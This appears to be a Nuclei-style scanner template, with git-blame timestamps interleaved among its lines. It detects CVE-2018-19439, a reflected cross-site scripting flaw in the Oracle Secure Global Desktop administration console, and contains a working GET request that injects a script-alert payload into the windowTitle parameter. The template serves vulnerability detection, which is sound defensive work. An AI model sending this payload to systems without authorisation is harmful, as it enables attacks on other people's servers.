2021-01-02 05:00:39 +00:00
id : CVE-2018-19439
2020-06-22 13:35:37 +00:00
info :
name : Cross Site Scripting in Oracle Secure Global Desktop Administration Console
2021-06-09 12:20:56 +00:00
author : madrobot,dwisiswant0
2021-09-10 11:26:40 +00:00
severity : medium
2020-08-25 22:22:08 +00:00
description : XSS exists in the Administration Console in Oracle Secure Global Desktop 4.4 20080807152602 (but was fixed in later versions including 5.4)
2021-02-05 19:44:41 +00:00
tags : cve,cve2018,oracle,xss
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.10
cve-id : CVE-2018-19439
cwe-id : CWE-79
reference :
- http://www.securityfocus.com/bid/106006
- http://seclists.org/fulldisclosure/2018/Nov/58
- http://packetstormsecurity.com/files/150444/Oracle-Secure-Global-Desktop-Administration-Console-4.4-Cross-Site-Scripting.html
2020-06-22 13:35:37 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--&>helpFile=concepts.html"
matchers :
- type : word
words :
2020-07-10 20:12:41 +00:00
- "<script>alert(1337)</script><!--</TITLE>"
2020-06-22 13:35:37 +00:00
part : body